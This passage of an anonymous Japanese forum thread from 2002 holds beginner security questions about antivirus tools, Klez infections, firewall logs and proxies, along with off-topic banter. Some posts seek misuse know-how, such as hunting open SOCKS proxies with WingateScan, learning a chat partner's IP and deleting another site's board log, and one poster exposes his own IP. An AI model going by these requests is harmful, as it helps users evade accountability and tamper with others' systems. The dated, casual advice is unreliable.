コマンド プロンプトでﾁｬｯﾄなどでIP抜く方法教えてください

>>616
netstat ?

参加者に非通知な設定になってるチャット「相手」のIPアドレスを知りたいということで宜しいか。

できまへん。

>>613
セキュリティツールは軽さではなく機能や使い勝手や設定が理解可能かどうかで選ぶ。
ZoneAlerm（アンインストール時は要情報収集）かKerio（旧Tiny）が無難。

>>618
「コマンドラインでチャット」してる相手のIPアドレスを知りたいんでは。
…talkコマンドかなんか使ってるんか(w

サーバー（やCGI）経由のチャットで、サーバー（やCGI）側で情報提供してないなら不可能。
1対1でチャットしてるなら>>617。そういうことが全然調べられないなら火傷する前にやめとけ。

最近のNewbieの言うところの「チャット」って何指すんかいのぅ。NetMeeting？

ＰＣ立ち上げた時点でADSLを起動させて自動接続したいのですが・・
先輩方おしえてください

いやです　おしえません

>>620
環境をまず書け。OSの種類は？ISPはどこ？ルーター使ってる？PCは一台？

そんな質問じゃまともなレスは付かない。

>>620
DHCP鯖・・・
ってか、するだろ。

>>620
つーか、セキュリティ板で聞く内容じゃない。
プロバ板かPC初心者板でどうぞ。

win98再インストールしたのに１週間もたたないうちに
ノートンの木馬バックオフィスの警告がでました。
これは、再インストールの失敗でしょうか？

おめでとうございます！！
成功です！！












踏み台のなっ！

>>626
煽りは他でやれよ。

まじめな話どうしたらいいんでしょう。
０でメモリーを埋め尽くすとか？

>>628
その警告とやらを書けよ・・・

>>629
>625に
>ノートンの木馬バックオフィスの警告

って、書いてあるでしょ。。。。
漏れ、ｺﾝﾅﾉﾐﾀｺﾄﾅｲﾖ･･･
(((（ ;ﾟДﾟ)))

>>630
inboundだったら？

>>631
>ノートンの木馬
こんなの、、、ｷｲﾀｺﾄ････ｱﾙｶﾖ?
(((((((((((((((((((((((((((( ;;;ﾟДﾟ)))))))))))))))))))))))

いま接続中の私のIPアドレスをここで公開したら
なにかされますか？

とりあえずpingを打ってみたいと思う所存です

>>633　−　>>634
ワロタ

いま、地方自治板見てきたら、スレに宣伝ＨＰがリンクされて
ました。見てしまったけど、何か実害ってありますか？

ではどうぞ
IP アドレス:
219.99.124.97

まだかな？

>>637
fusianasanしろ。

なんだ、なんともないや。

>>リモートホスト晒す方が危険なんですか？

三三七拍子でping打ってみました

fusianasanしたよ。
さっきとはちがうよIP。
ダイヤルアップだから再接続ね。
TBTnni-10p354.ppp12.odn.ad.jp
でしょ。

>>632
ノートン先生が木馬に乗ってゆらゆら揺れてるんじゃないの？
唇を噛み締めて「ママー！」と叫んでいると思われ。

ノートンはどこで買ったら一番安いですか。
電気屋酸ですか。シマンテックのサイトですか？

>>645
ヨドバシカメラ

646さん　ありがとう。淀橋行ってきます

大久保のタチンボ村がいいですよ。

PCがちゃんと起動途中で止まる様になってしまったんですが
（何度かやり直すと起動する。Safeモードがいつも立ち上がる？）
こういう症状のウィルスってありますか？

「PCが『ちゃんと』起動途中で止まる様になってしまった」

お前の頭がウィルスに冒されている

WindowsME

冗談でなくMEは定期的にOS再インストールしないと
だんだんそういうことをやらかすようになる

ごめんなさい。書き直した時消し忘れました

PCが起動途中で止まる様になってしまったんですが
（何度かやり直すと起動する。Safeモードがいつも?立ち上がる）
こういう症状のウィルスってありますか？

です

VBS.Internalっていうウイルスをもらっちゃいました。どんな影響が出て
くるのでしょうか？ファイルの削除だけでよいのでしょうか？

>>651
MEです。
パーティションを３つに切っていて
OSの入っているＣドラをフォーマットして入れ直したんですが直りませんでした
HDD丸ごとやらないといけないんでしょうか？それとも原因は他にある？
ハードウェアの問題なんでしょうか？

潜伏後に名前を変えるウィルスがあるそうですが
名前を変えた後、Nortonに引っかかるのですか？

この夏ブラクラにやたら引っ掛かってしまったので心配です

ってかノートンアンチウイルスとAVGってどっちが良いんだ？

こっちはココが優れてるとか教えてくれ！

>>656
検出力はノートンがよい、ただし重い、AVGは軽いし無料、
ウイルス怖いならノートン使えば安心
なんとかなんべ！って人はAVGかな

すいません。一番簡単なフリーのファイアーウォールソフトってなんですか？
OSはXPです。

>>658
Zone Alarmが一番簡単だと思う、スレ立ってるから見てみ

やたらに落ち、起動を繰り返すようになるなどは、
CPUの熱暴走、またはその寿命、何らかのデバイスの取りつけが緩んできた、
なども犯人候補に挙げられる。

DNSで逆引きできないホストは遮断とか
.kr .tw .go.jpは遮断とか出来るソフトは有りますか？

ネットでなんか注文する時、
個人情報（住所とか）を
ガードするらしい方法
「SSL対応」ってなんですか。

>>661
前者はシランが、後者はいくらでもある

>>662
検索しろ　タコが

>>659
ありがとうございます。
早速使ってみます。

ノートンってよく聞くんですけど、プロレスラーのノートンのことですか？

そうです

これでも完璧なんだとさ・・・（藁

ttp://218.139.146.99/

よく「串」って聞くけど何のこと？

>>669
焼き鳥って知ってるか？

おしえません

よく「串カツ」って聞くけど何のこと？

ﾁｮﾛQって公道走れるんですか？

僕も初心者なので「串」の意味教えて！

>>673
なんか質問ちゃう・・・。

>>673
大丈夫！チョロQの製造ナンバーが、車のナンバープレート。

>>676
走ってても気づかれない罠

厨房スレってどこ？

厨房スレはここ

イケナイ姉これから弟にイタヅラします
http://jbbs.shitaraba.com/computer/bbs/read.cgi?BBS=2784&KEY=1029503890&LAST=100

100KBはバイトに直すと何Bなのでしょうか？

日経バイト

>681 いまいち面白くない
K=1024倍か1000倍

>680
１００Ｋバイトです

>>680
ゴングロ親父ッス！
1024byte * 100 で答え出るかな。

『＊』って何ですか？

>>685 それはたぶん掛け算でしょう。

>685
米のことです

シモネタ嫌いなのね。　

あぼーん

>>689
ういうのは他の板行ったら？
反応も多いだろうしさ。
ここ、過疎の板なんで。。。
平均年齢も高いだろうし。

巧妙にcookieを潜り込ませる。
この会社って何？
　　↓
imrworldwide.com/cgi-bin

test　　

>>691
普通の会社。

「巧妙にCookie」を説明してくれないことには何とも。

質問です。
昨日から何かされているようなﾖｶﾝが…いったい何が起こっているのでしょうか？

OSはWindowsXPで、FWはノートンです。
ノートンのログには次のように出ていました。

日付: 2002/08/20 時刻:
今回 1 回だけﾕｰｻﾞｰが選択したのは 「遮断」 通信｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ UDP ﾊﾟｹｯﾄ
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 0.0.0.0,isakmp(500)
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは *.*.*.*.isakmp(500)
ﾌﾟﾛｾｽ名は C:\WINDOWS\system32\lsass.exe

これと全く同じアクセスが不定期に数回来ました。
ちなみに、リモートアドレスは東京の某私立大学でした。

「某私立大学」を説明してくれないことには何とも。

漏れも毎日一橋大学から変なポートに何回も来るよ。
設定ミスかなんだかわかんないから放置だけど。

>>696
早稲田です。

うん、時々そーゆー「非・会社」なとこからも来るねー。

こっち側でブロックできてるなら他のジャンク通信と同様放置。
1時間に数十回来てるよログ太るよとかボク親切だから報せてあげないととか
そーゆー気持ちがある場合は
その組織のネット上のなるべく上のほうっぽい人のアドレスにｺﾞﾙｧメールしる。

lsass.exe ログオン資格の認証を実行する Windows のプログラム
だそうな

調べたところによるとlsass.exeっつーのは500番ポートを利用しているみたい。

>>695
lsass.exeってゆーとSQLのワームの記事で見たことあったから
それかなって思ったんだけど、うーんどーなんでしょ（茂男風）

↓にも似たことが書いてあった。
http://www.google.co.jp/search?q=cache:W0KTFDobfvAC:sapporo.cool.ne.jp/yokoteru/nikki/nikk0108.htm+lsass.exe+500&hl=ja&lr=lang_ja&ie=UTF-8

>>698
>>699
>>700
返答ありがとうございます。
とりあえずブロックできてるみたいなので、放置しときます。

>>701
http://www.microsoft.com/japan/support/kb/articles/JP291/3/40.asp
のパッチは入れときなよ。

厨房です。
教えてください。
知人（一度しかメールしたことないひと）に、
ｵﾚのYAHOO!のメールアドレスで
『background』とかいうタイトルでメールが届いたとのこと。
おまけにエクセルのファイルとHTMLのなんかが添付されてて、
開こうとするとウイルスバスターが立ちあがるって。

ｵﾚのYAHOO!メールはどうなってんだ？
どうすればいいんだ・・・・・

http://www.nai.com/japan/virusinfo/klezezukai.asp

もしかするとその知人は田中さんだね
どうでもいい知人なら思いっきり罵倒すれ

質問です。自作板を覗くと、NAVがビンビンに反応して以下のログを吐きます。
なんででしょうか？
日付: 2002/08/21 ､ 時刻: 0:24:52
ﾌｧｲﾙ
:\Temporary Internet Files\Content.IE5\4WF4G6B0\l50[1]
は Macro.src ｳｨﾙｽに感染しています｡
このﾌｧｲﾙを修復できません｡


日付: 2002/08/21 ､ 時刻: 0:24:52
ﾌｧｲﾙ
:\Temporary Internet Files\Content.IE5\4WF4G6B0\l50[1]
は Macro.src ｳｨﾙｽに感染しています｡
ﾌｧｲﾙへのｱｸｾｽが拒否されました｡

>>705
気にするな

すんません、これも似たようなものなんですね。厨房なんで勘弁してください。
ケーブル切って括って逝って来ます。

毎日ウィルスメールが１０通来て困っております。
どうしたらいいのでしょうか？
プロバイダのメールフィルター使っても受信してしまいます。

毎日ウィルスメールが来て感染して困るならわかるが
感染しないんなら無視すれ

>>708
メールを使わない、これ、最強

相手の

ｈｐをみに行った際、相手にアクセスログがのこるんですが、
それってのこさないようにできないんでしょうか？

>>711
出来ません　気にしなくてもいいことだと思うけど･･･普通はね

そっか。ありがとうございました！

いえいえどういたしますて

全部ウソです

「○○はできますか？」

一般にデキナイので、それ書く前に○○をやりたい理由もあらかじめ書いとけ。
無理に○○する以外のナイス（死語）な解決法があるかもしんない。

当方フレッツADSL８M、ルータYAMAHA　RTA54I　セキュリティLV7
で設定してネットつないでます。８MにしてからMSNのサイトや、
個人サイトにいくだけでルーターから警告音が鳴ります。
FW状態を見てみるとこちらから相手側へ　SYN〜なんとかとしている様で、
相手側からは　ポートスキャンされてるって表示されます。
マニュアル見てもSYN〜のことは書いてませんし、サポートもつながりません
おんなじような状態のかたっていませんでしょうか？

あとADSLなのに、PPP接続を可能にするアダプタってあるんでしょうか？
はっきりいって厨房ですスミマセン。

ここの場所で聞いていいのかわかりませんが、よろしくお願いします。
私の会社は社内LANで専用線でのＩｎｔｅｒＮｅｔ環境です。
仕事中にYahooのフリーMAILで友人とやりとりしています。
そういうのってログを調べられれば
○月○日○時○分にどこの席（IP）から×××＠××.ne.jp宛てに
内容はこんなのを送信した！・・・とかって調べればわかるものですか？
Administrater権限ある人は簡単にログみれる？
もし詳細について参照できるサイトがあればアドレスなどを教えていただけないでしょうか？
よろしくお願いいたします。

>>717
既出
http://pc.2ch.net/test/read.cgi/sec/1029866777/

>>717
パケットの盗聴をすれば可能、しかしそこまでするほど管理者はヒマじゃない

>>718
微妙。

>>717
普通の会社は通信の記録を取っている。内容を保存している場合もある。
どの程度取ってるのかはユーザー側からはわからないのであきらめれ。
会社の資産を私用に使っておいてバレるとか文句言うな。あとスレ削除依頼しれ。

仕事中に関係無さそうなサイトを見ててログから
「君ちょっと・・・」ってのはあるみたいだけど
ま、嫌なら自分のPC持ち込んでAirH"とかでやり取りすっとかあんでないの

★質問★ログってどこまで？
http://pc3.2ch.net/test/read.cgi/isp/1029866997/
【質問】ログってどこまで知られるの？
http://pc.2ch.net/test/read.cgi/sec/1029866777/

11 名前：春香 ：02/08/21 03:33 ID:R1QsvRI7
だって〜重要な深刻な内容なんです〜
彼氏がAdmin権限持ってる責任者で
半殺しに会うかもなんです。

まぁ基本的な回答そのものはどこで聞いてもいっしょだし。
こんだけあちこちでスレ立てしてれば追跡も楽でしょう。

ありがとう、でもＯＵＴだぁ
退職しよっ　、、もおダメ　殺されちゃうかも

>>724
通報しますた

>>725

全部でこれだけですか？
http://pc.2ch.net/test/read.cgi/pcqa/1029869207/
http://pc.2ch.net/test/read.cgi/sec/1029866777/
http://pc.2ch.net/test/read.cgi/sec/1028559356/717
http://pc3.2ch.net/test/read.cgi/isp/1029866997/

>>725
Why do you start so many different threads with the same question???

>>727
春香は今ココで暴れているがな。
【質問】Administrater権限ある人はログみれる？
http://pc.2ch.net/test/read.cgi/pcqa/1029869207/l50

┌────────────────────────┐
│　　　　(￣￣)　　　　　　　　　　　　　　　　　　　　　　　　　　　│
│　　　　 ）　 （　　　　　　　ドキュン厨房認定証　　　　　　　　 │
│　　　／ 2ch ＼　　　　　　　　　　　　　　　　　　　　　　　　　　│
│　　　| ∧＿∧ |　　　　　　　　　　　　　　 認証番号第５号　　│
│　　　|（　｀∀´）|　　　　　　　　　　　　　　　　　　　　　　　　　　│
│　　　＼＿＿／　　　　　 　　　>>725（春香）殿　　　　　　　　　　　　 │
│　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　│
│　貴殿が２ｃｈドキュン厨房認定委員会の定める認定基　　│
│　準（第３項）を達成していることをここに証する。　　　　　 │
│　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　│
│　　　 平成１２年５月６日　２ｃｈドキュン厨房認定委員会　 │
│　　　　　　　　　　　　　　　 理 事 長　 ひろゆき＠管直人　 │
│　　　　　　　　　　　　　　　 認定委員　名無しさん　　　　　　│
└────────────────────────┘
2枚目ゲットおめでとー

ルータ（いわゆるブロードバンドルータ）のパケットフィルタリングのログにUDP　3番のパケットをフィルタリングしたものが大量に残っているんだけど、これって何？
googleで調べてみても
「service名　compressnet」
ってくらいしかでてこない。
そもそもcompressnetってなんなんでしょう？

よろしくお願いします。

ＨＤＤスキャンをされるとどういうことが心配になってくるのでしょうか、
教えてくださると助かります。不安なので・・・

>>732
エロ画像隠してるのがバレる

tp://sakashita.strangeworld.org/source/up0768.jpg

↑これは何ウイルスでしょうか？

>>734
開いてみろ

>>734
ヲマエ、ヴァカだろ？

真性厨房ウィルス夏風味です
きみが

>>737
>>737

ん？みなさんどうされたのですか？
踏んだから馬鹿ってこと？

VBS.LoveLetter.Var
というウィルスがありました

>>739
うん、ヴァカ。

ｳﾞｧｶで結構です。
貼った香具師より踏んだ香具師の方がｳﾞｧｶということ？
それともそんなのウィルスじゃねーよってこと？

あ、自己解決しました。

みんな仕事の合間にかまってやってることに気付かないリア厨な君が馬鹿

>>741
貼った香具師も踏んでワアワア騒ぐ香具師もヴァカ。

ワアワア

>>734はいま上司に見つかってきっちり絞られてます。��(´∀｀)ﾁｬﾝﾄｼｺﾞﾄｼﾛﾖ!

クレズの駆除ツールって、感染してないパソコンでインストールしろと書いてあるけど、
感染しているパソコンでやってはだめなんですか？
パソコン１台しかないものですから・・

>>747
駆除できなくてもいいならどうぞ

>なめこたん
ちょっと何が言いたいのかよくわからん。

Symantecの駆除ツールなら、感染中のパソで実行しても問題が無いが。
http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.removal.tool.html

というか。どういう環境なんだ一体？

>>749
感染してるＰＣでダウソしてはだめなんですか？

今の状況、クレズに感染したファイルが３つ出てきて、どうしようかと・・

>なめこたん
>今の状況、クレズに感染したファイルが３つ出てきて、どうしようかと・・
どこに、どういう名称のファイルが、どういう状況で、どんなアンチウイルスソフトで検出したのか、そしてOSは何で感染源は何なのか、これがワカランとマジレスができない。

>>751
どこに C:\_RESTORE\TEMP\A0015173.CYP
　　　　C:\_RESTORE\TEMP\A0015351.CYP
　　　　C:\_RESTORE\TEMP\A0015430.CYP

アンチソフト　ウイルスバスター'02体験版

ＯＳ　Ｍｅ

感染源　メール受信と同時に感染

欠けてるところはわかりません

>なめこたん
2つのスレでやり取りするのは面倒なんだけど。
とりあえずこれ見れ。
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=2186

要は、復元ポイントを無効化してから、該当ファイルを駆除。
バスターならオンラインで購入して、もらったシリアルを突っ込めば、体験版が即製品版になる、確か。

ウイルスバスター２００２のログみたんですが
　クローキングってなんですか？

ウェブを串経由で閲覧中に、自分のウェブメールのメールボックスを覗いたら、
経路調査されたらこちらの正体はばれたも同然?

>>754
調べろ！

>>754
バスターの説明書に載ってます。

>>755
可能性はある。

>>753
なるへそ、やってみます

>>757 私が未熟でした。んで、わかりました。んで、
　　　ログをみたんですが、「ファイアーウォール」とやらで防いでいる
　　　侵入者が１時間のあいだにだいたい７つぐらいあるのですが
　　　これってふつうですかね？

>>755
あい、そです。
罠串というかそゆ目的の串も、多々存在しまする。

>>759
普通、なのかなぁ。CodeRed2全盛の時は、一時間に1000ほと来たよ。
いずれにしても、バスターはウイルススキャン機能は有能な方だけど、Personal Fire Wall機能は駄目っぽいってのが定説。
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=3346

関連
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=3283
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=3374
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=3376

>>761 　1000はすごいですね。

マグロラーメンはどこいったんでしょう？？

>>762
あの頃は、それ位の数字は漏れの所だけじゃなくても、ありがちだったんじゃないかなぁ。
黒氷を遊びで入れてたパソが、ログファイルがすごく巨大になってビビッた記憶がある。

経緯がずらずらと書いてあるサイトを見てくれと書いてあったんですが、
そもそも何が問題なのかよくわからないので、識者の意見求む。
洩れは、単にその人のＰＣがおかしいと思うだけなんだけどね。

最大手インターネットプロバイダＯＣＮが行っている不正アクセスの証拠隠滅や個人情報の漏洩に関する話
http://www8.ocn.ne.jp/~dsbfisnp/

起こっている現象や対応の仕方から判断しても犯人を知っているのではないかという気持ちも消えません。
以上の事を持ちまして、インターネットにて、事の成り行きを公表し、皆さんの判断や意見を聞きつつ、
ＯＣＮに情報の提供を期待したいと思います。

>>765 そういえばウイルスバスターのファイアーウォールログを見て
　　　ＩＰを調べたらＯＣＮがでてきた。

＞cheshire-cat タン
とりあえず無効化して、Symantecでサーチしました。
英語（？）は読めないので、結果が良くわかんないけど、３という数字は一番上の項目
にあったよ。

次は復元ポイントの作成？

をっと、書き忘れた、　感染したときからＨＤが絶え間なく唸っていたのが止まりました

http://pc.2ch.net/test/read.cgi/sec/1028117622/154-162
これなんて雑誌に載ってたのかしらん
誰か読んだ人います？

>>765
ちょっと読んでみた限りでは、

そもそもの出発点、２月ごろにまぐまぐの登録確認メールが届かない事象
からして、この人は、OCNのメールボックスがいっぱいでメールが戻って
いるのではないかと想像されます。OCNは、5MBまでしか保存しない。

メールアドレスは丁寧に消してあるけど、お客様番号がしっかり書いて
あるのはいいんでしょうか（ｗ

>なめこたん
だーかーらぁー。中途経過を省くなちゅうの。
デスクトップにシマンテックの駆除ツール置いてスキャンすると、Logファイルがデスクトップにできるっしょ。
Neither うんぬんって内容のが。Neither。。。。ってのは、「無かったよん」の意味。
「3っつ」ってのは、感染ファイルがあったよん、って意味、なのかな。詳細書かないと、レスのしようがない。

えーっとですね。
1）まずEicarを踏んでみそ。KLEZのレトロウイルス機能（アンチウイルスソフトを無効化する機能）が発動、つまり感染確定でバスターが死んでいるなら、Eicarを踏んでもウイルス検出警告は出ない、はず。
http://www.trendmicro.co.jp/support/download/eicar.htm

2）んで。バスターの設定画面から、アンチウイルス機能を一時的に停止しれ。常時スキャンをしないとか、そゆ項目だったって記憶してるけど、手元にバスター入ってるパソが無いんでわからん。
さらに。Antidote簡易版をDLして実行して、どっかに残っていないかチェックしれ。
http://www.vintage-solutions.com/Japanese/Antivirus/Super/

いずれにしても。1）2）をやって検出されないなら、心配ない。
ベタなKlez系なら、漏れが書いたSymantecの駆除ツールの処理で十分対処している、はず。

それでさぁ、漏れはこの板に今まで何回も書いたんだけど。
アンチウイルスソフトの一番の機能は、常時スキャン機能。
さっさとバスターを購入して、常時スキャンしれ。

すごくくだらない質問ですが、携帯にメールでブラクラのリンクおくって、
携帯で実行すると、ぶっ壊れますかね？

つかれてますか？もしかして

>>773 目と足は疲れてます

携帯にmailtoストームが効くと思いますか？
携帯にFDDあたーくが効くと思いますか？
携帯にconconが効くと思いますか？
私は思いません。

漏れは、
１）で検出した
２）で何にも出なかった

いかが？

だんだん口調がぞんざいになるね

>なめこたん
んなら、いいんじゃないでしょか、とりあえず。
というか。
体験版に依存するな。

んで。漏れがAntidote簡易版によるスキャンを薦めたのは、レトロウイルス機能という、KLEZ系villi1によるアンチウイルスソフトの死亡の有無を確かめる目的。
ちゃんと製品版で常時スキャンしてれば、間違って添付ファイルを開いてもちゃんと感染活動を防いでくれまする。

というか。さっさと購入してバスターで常時スキャンしれ。

すまそ、わかりました・・
でも金がないのねん

原因がわかりマスタ、非常に初歩的のことです、　プレビューウインドウがＯＮでした。
以後気をつけます。

よかったですね

ぼくもうれしいです

小遣いをあげよう

教えてください

ノートンでマン毛生活は送れるでしょうか？

ネット初心者なのでどなたか教えて下さい。
先日ブロードバンドにしました。
で、ＷｉｎＭＸを試したんですけど、早速誰かに攻撃されたみたいでネットに繋げませんでした。
サーバーのメッセージを見ると強制接続終了のメッセージが山ほど出てきました。
これはどのように解釈すればよいのでしょうか？
あと、もうＷｉｎＭＸを使ってはいけないのでしょうか？
どなたか答えてやっても良いという方がいらっしゃれば１つよろしくお願いします。

１つよろしくお願いしますって言ってもらってもなぁ

１つでいいのかな？？

早い者勝ちで１つしか答えられませんねぇ

どうしようかな？？
私が答えると他の方達が答えられなくなるし

うぅぅん　困った。
どうしましょう

こうやって困っている私に
ここはどなたか１つ相談にもってもらえませんか？？
おながいします

>>783
困りましたねぇ、私で止まっても解決しなかったらマズイですよねぇ
次の方にお願いした方がよろしいかもしれませんね

>>782
MXを使ってはいけないってことは無いが、
初心者はMXやめとけ

　　 ＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿
　／
　|　ペドでアニヲタでワレザ、んでMX厨房です
　|　どなたか答えてやっても良いという方がいらっしゃれば１つよろしくお願いします･･･
　＼
　　 ￣￣＼|￣￣￣￣￣￣￣￣￣￣￣￣
　　ﾍﾟｺﾘﾍﾟｺｰ　　　
　(( ∧∧ ヾ
　　(´Д`;)
　　（mm ）
　　￣￣￣

次の方どうぞ！！

ノートンのＩＳ2002を入れたら
Yahooのメッセが　できません。
MSNのメッセはできるんですけど…

なぜでしゅか？

あぁ、放置されてしまったようだ......

かぶっても泣かない

>>788
幕張に行ってみるというのは？

おなかすきました。

まぐろをくわしてください

まぐろでいいからくいてぇ！！

>>791
ウマい！！
山田くーん
座布団全部持っていきなさーい

>>794
さんざんガイシュツのネタで座布団とは（以下略）

円　楽　も　堕　ち　た　な

こんばんは

私　マグロ一郎と申します

私、鯖京子と申します。はぁ

わしゃぁ映画館でウンチを漏らしてしもぉたことがあるんじゃ。
「劇場版カードキャプターさくら」を見始めて３０分ほどたったあたりじゃったんじゃ。
急に腹痛が始まり、額から脂汗が出てきましたんじゃ。
結構重要なシーンじゃったけぇ、席を立つことが出来ず
半分出しかけながら、映画に集中することに努めましたんじゃ。
時々、ウンチの匂いが鼻につくんじゃけぇの。じゃが、周りゃぁ
まだ気づいとらんじゃろうゆぅて思いましたが、隣に座っとったお姉さんは
嫌な顔をしとったんじゃ。わしの尾てい骨の辺りゃぁ汗でじっとり
しとるんが解るんじゃ。じゃが、このシーンを見逃すこたぁ出来ない！
葛藤し続けましたんじゃ。
「あっ・・・・・・」「ブビブビブビブビ・・・ブッ！」
ついに、耐えきれなくなったわしの肛門からぁ、柔らかめのウンチ
が大きな効果音と共に放出されたんじゃ。わしの席の両隣、前後の人は
わしの方を振り向きましたんじゃ。お姉さんは無言のまま、席を立ちましたんじゃ。
みんなわしにひやい視線を向けてくんじゃけぇの。若いカップルはわしに対して
「キモイ」だの「臭い」だの言ってきましたんじゃ。
そのうち、わしの周りからぁボツボツと席を立つ人が出てきましたんじゃ。
多分、わしのせいじゃろう・・・。いや、わしのせいじゃ。
開き直ったわしゃぁ最後まで見続けましたんじゃ。冷えたウンチを抱えながら・・・。
映画が終わり、主題歌が流れたところで
わしもトイレへ駆け込み、汚れたパンツを流したんじゃ。
こりゃぁ実話じゃ

800げとうんこ漏らしage

鯖京子さん

よろすくおながいします

こんど、すし屋に食事でもいかがでしょうか

　 　　||　　　　　　
　ノ⌒||^ヽ　　　　
彡/‖￣ ヽ　＜　マグロなんて嫌に決まってんじゃ死ねバカ！！
　|　|`====′　　　
　|　|＿＿｜　　　　　　
　凵 ＃＃ヽ　　　　　　　
　∪＃＃＃ゝ　　　　　
　　^Ｔ TT´
　　　| ｜|
　　　「 「 |
　　　し'し'

なんと韓国で、Kchannel.netってのが出来ていた。
真実はここ→http://www.kchannel.net/index.php
本家本元の2channelは一体どうするのか？

http://ocn.amikai.com/amitext/indexUTF8.jsp
↑日本語←→韓国語翻訳ページ

　　　(V) ∧_∧(V)
　　　　ヽ( ﾟ▽ﾟ)ノ　　ﾌﾗﾚﾀﾈ!!ｱﾋｬ
　 　　　/　 /
　　　　ノ￣ゝ
　　　(V) ∧_∧(V)
　　　　ヽ( ﾟ▽ﾟ)ノ　　ﾌﾗﾚﾀﾈ!!ｱﾋｬﾋｬ
　 　　　/　 /
　　　　ノ￣ゝ
　　　(V) ∧_∧(V)
　　　　ヽ( ﾟ▽ﾟ)ノ　　ﾌﾗﾚﾀﾈ!!ｱﾋｬﾋｬﾋｬ
　 　　　/　 /
　　　　ノ￣ゝ
　　　(V) ∧_∧(V)
　　　　ヽ( ﾟ▽ﾟ)ノ　　ﾌﾗﾚﾀﾈ!!ｱﾋｬﾋｬﾋｬﾋｬ
　 　　　/　 /
　　　　ノ￣ゝ
　　　(V) ∧_∧(V)
　　　　ヽ( ﾟ▽ﾟ)ノ　　ﾌﾗﾚﾀﾈ!!ｱﾋｬﾋｬﾋｬﾋｬﾋｬ
　 　　　/　 /
　　　　ノ￣ゝ
　　　(V) ∧_∧(V)
　　　　ヽ( ﾟ▽ﾟ)ノ　　ﾌﾗﾚﾀﾈ!!ｱﾋｬﾋｬﾋｬﾋｬﾋｬﾋｬ
　 　　　/　 /
　　　　ノ￣ゝ

いいわよ　まぐろ一郎さん

だけどすし屋はいや

ホテルでまぐろならｏｋ

　 　　||　　　　　　
　ノ⌒||^ヽ　　　　
彡/‖￣ ヽ　＜　偽者は死ねバカ！！
　|　|`====′　　　
　|　|＿＿｜　　　　　　
　凵 ＃＃ヽ　　　　　　　
　∪＃＃＃ゝ　　　　　
　　^Ｔ TT´
　　　| ｜|
　　　「 「 |
　　　し'し'

誰かWINDOWSでnmapのインストールの仕方教えてください！

>>807
(ﾟДﾟ)ﾊｧ?

>>807
nmapはwindows上で動きません

>>809
ハァ？

>>810
意図汲めない人ﾊｹｰﾝ

おい　まぐろ一郎　どこいった

NMAP NTかぁ。
ほとんど使ってないな。

Nroton Internet Security2001使用していますが、
最近話題のスパイウェアが外部へデータを送信するのを
検知することはできないのでしょうか？
やっぱAD-Awareとか使わないとだめぽ？

>>811
お前がダメなんじゃない？

おい　まぐろ一郎　どこいった

http://pc.2ch.net/test/read.cgi/sec/1030094366/l50

検索エンジン登録ソフトでＨＰを登録したんです。
そうしたら懸賞系の検索エンジンに間違って登録してしまった
みたいで当サイトにふさわしくないので削除しましたと記載されてました。
それで規約通り損害賠償と人件費で5000円振り込めと書いてありました。
どっかに規約は書いてあったみたいですがいちいち規約なんてみないし
登録画面だけしか表示されなかったので登録してしまいました。
お金を払わなければＩＰから身元を割り出して調査代も上乗せして
請求すると書かれていました。
お金なんて払うき一切ないんですが怖いです。

>>818
どこのサイトだよ？
ネタだろうな

windowsのsystemにwqk.dllというファイルがあったのですがウィルスでしょうか？

＞＞８１９

ネタじゃないから悩んでます

だーかーらー、どこのサイト？

>>821
漏れならまったく気にしない。
IPから身元割り出して請求してきてほしい。
で、何が怖いの？

>>819, >>822-823
宣伝業者がびびってるだけだろうから放置しとけ。

ホストが表示される板で
xxxxxx．xxxxx．xxxxxxxx．xxxxx．ne.jp<8---><-1--><--0-><---0>
と表示されるんですが､(勿論一部伏せましたが)
右端の4つのカッコが気になります｡
他の人は出ていなく、自分だけなんですが､
何が問題なんでしょうか？

ホムペの荒らしがかなり増えてウザイんですが撃退方法はないですか？

>>826
アク禁

>>825
カッコ内はポートチェックで空いてると判断されたポート

他人の掲示板のログを消す方法をおしえてください

>>829
レス番号入れて削除用パスワード入れて削除ボタンを押す。

>>830
そうではなくて、
log.datを削除させちゃう技ききたいんじゃないのか？

>>831
それはない

掲示板を作れる程度にPerl勉強してください。

>>831
どーでもいいけど829だとばれないように援護してください。
見てて痛いです。

確かに痛いな

おいしいクッキーが食べたい
最近毒クッキーばかり食べ過ぎてお腹いっぱい

>>836
http://www.nethack.org/

ハッキングでお金を稼いでハッキンガム宮殿を建てたいのでどうするのか教えるべきだ、俺に

>>838
夢・独り言
http://life.2ch.net/yume/

オンラインウィルスチェックしたらKlez.H検出されました。
C\Recycled\Do64.scr　ってとこに入り込んだらしいのですが
コレって削除しても平気ですかね？？

Cドライブ探しても見つからないのです・・。

>>840
平気。

探せば見つかる

>>841
マジすかっ？
んじゃー削除しちまいます！
ありがとうございましたー

http://66.250.61.247/wasabi/select_and_out.php
ダウンロードしても大丈夫ですか？

どうも初めまして、色々とお尋ねしたいのですが。

socks串の探し方。
コレはUP板など探せばあるようですが数が少ないのと
個人的に欲しいのが日本IPの串なので却下(偽装解除スキル無いし）

そこでWINGATEスキャンなるものがあると聞いたので早速入手
したのですが使用方法が良くわかりません

■hostname or IPというところには自分のIPを
　書き込めばいいのですか？
■ポートは1080でいいのでしょうか？
■チェックで3択の所がありますがどれを選べば・・・・？

■日本IPの串を優先して探すコトは可能でしょうか？
　(可能であればよい方法教えて頂きたいです)

使っているソフトはWingateScanというやつです


自分勝手な書き込みですがレス・回答頂けると嬉しいですね。

オンラインセキュリティチェックで私のネット環境がとんでもなく危険である事を知らされて鬱です。
一応３０日間お試しのヤツを導入したのですが、３０日を過ぎた後のことが気になってしょうがないです。
自分で何とかしようにも知識が無く、困っています。
厨房な発言は重々承知ですが、ベターなセキュリティツールなどを教えて下さい。おねがいします。

Macro.srcに感染してると出ました。
駆除の方法教えて下さい。

>>845
ZoneAlarm

今日、何気にトレンドマイクロのオンラインスキャンをしたら、
